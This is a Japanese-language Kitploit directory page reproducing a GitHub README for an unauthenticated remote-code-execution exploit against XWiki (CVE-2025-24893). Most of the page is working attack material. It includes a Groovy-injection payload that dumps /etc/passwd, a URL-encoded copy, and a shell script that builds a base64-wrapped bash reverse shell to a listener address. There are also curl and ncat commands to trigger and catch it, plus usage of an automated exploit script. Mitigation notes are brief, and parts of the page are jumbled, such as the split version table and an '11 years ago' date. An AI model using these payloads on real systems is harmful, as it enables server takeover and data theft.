Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/iiiejlyxakaptoiiiku/cve-2025-24893-xwiki-unauthenticated-rce-via-solrsearch
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubiiiejlyxakaptoiiiku/cve-2025-24893-xwiki-unauthenticated-rce-via-solrsearch

CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch

CVE-2025-24893 は、人気のあるオープンソースのエンタープライズWikiプラットフォームである XWiki における、深刻な未認証のリモートコード実行(RCE)脆弱性です。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
11年前未レビュー

CVE-2025-24893 – XWikiにおける未認証のリモートコード実行

0 目次

  1. 概要
  2. 脆弱性の詳細
  3. 影響を受けるバージョン
  4. 概念実証
    • 4.1 ペイロードの構築
    • 4.2 手動による悪用
    • 4.3 自動エクスプロイト
  5. 緩和策
  6. クレジットと参考文献

1 概要

  • CVE: 2025-24893
  • Component: SolrSearch マクロ (XWiki UI)
  • Severity: 9.8 / 緊急 (CVSS 3.1)
  • Attack vector: 認証不要のHTTP GET
  • Impact: 任意のGroovy実行 → システムレベルのRCE (Jetty/Tomcatユーザーの権限)

/xwiki/bin/get/Main/SolrSearch エンドポイントは、信頼できない text= 入力 を Freemarker テンプレートに直接連結します。
テンプレートを途中で閉じて、新しい {{groovy}} … {{/groovy}} ブロックを開くことで、攻撃者は認証なしで任意のGroovyコードを実行できます。


2 脆弱性の詳細

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=<<<USER-DATA>>>  HTTP/1.1

SolrSearch は指定されたテキストをプレーンなコンテンツとして埋め込むはずですが、マクロ ハンドラーは }}} をエスケープせず、次のようなことが発生します:

  1. }}} 現在のFreemarkerブロックを閉じます。
  2. 攻撃者は新しいマクロを開きます:
root@kitploit:~
   {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
  • async=false は同期実行を強制します(ゲストでも動作します)。
  1. GroovyはXWiki JVMプロセスの権限で実行されます。

/etc/passwd を出力する最小のPoC:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}

URLエンコード版(スペース → %20、中括弧 → %7B/%7D など):

root@kitploit:~
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

3 影響を受けるバージョン

ブランチ修正版脆弱な ≤
15.x15.10.1115.10.10 (および 15.9 / 15.8 のすべて …)
14.x LTS

(出典: OffSec アドバイザリ および XWiki SEC-S 2025-02)

エンドポイント


5 概念実証

5.1 ペイロードの構築

root@kitploit:~
RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444

# 1.   one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"

# 2.   Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)

# 3.   wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'

# 4.   URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")

5.2 手動による悪用

root@kitploit:~
# start listener
sudo ncat -lvnp 4444

# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"

5.3 自動エクスプロイト

xwiki_solr_rce.py は exploit/ に同梱されています(下記のコードブロック参照)。

root@kitploit:~
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>

ここで

root@kitploit:~
<TARGET URL> - URL including http:// or https://

(シェルの代わりに任意のコマンドを実行するには -c "id" を渡します) エクスプロイト リバースシェル


6 緩和策

  • アップグレード: 15.10.11 / 14.10.17 以降へ
  • 一時的な回避策: マクロを無効化
root@kitploit:~
# /etc/xwiki/xwiki.properties
solr.search.enabled = false

7 クレジットと参考文献

  • OffSec Research: 「XWikiの未認証RCE」 – 2025年2月20日
  • NVDエントリ: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • Exploit-DB #52136

研究およびPoC: DeX1d


免責事項: 教育目的のみで使用してください。自分が所有していないシステムに対して実行することは違法です。

ツールをダウンロード
14.10.17
14.10.16
13 / 12保守終了 – すべて脆弱なまま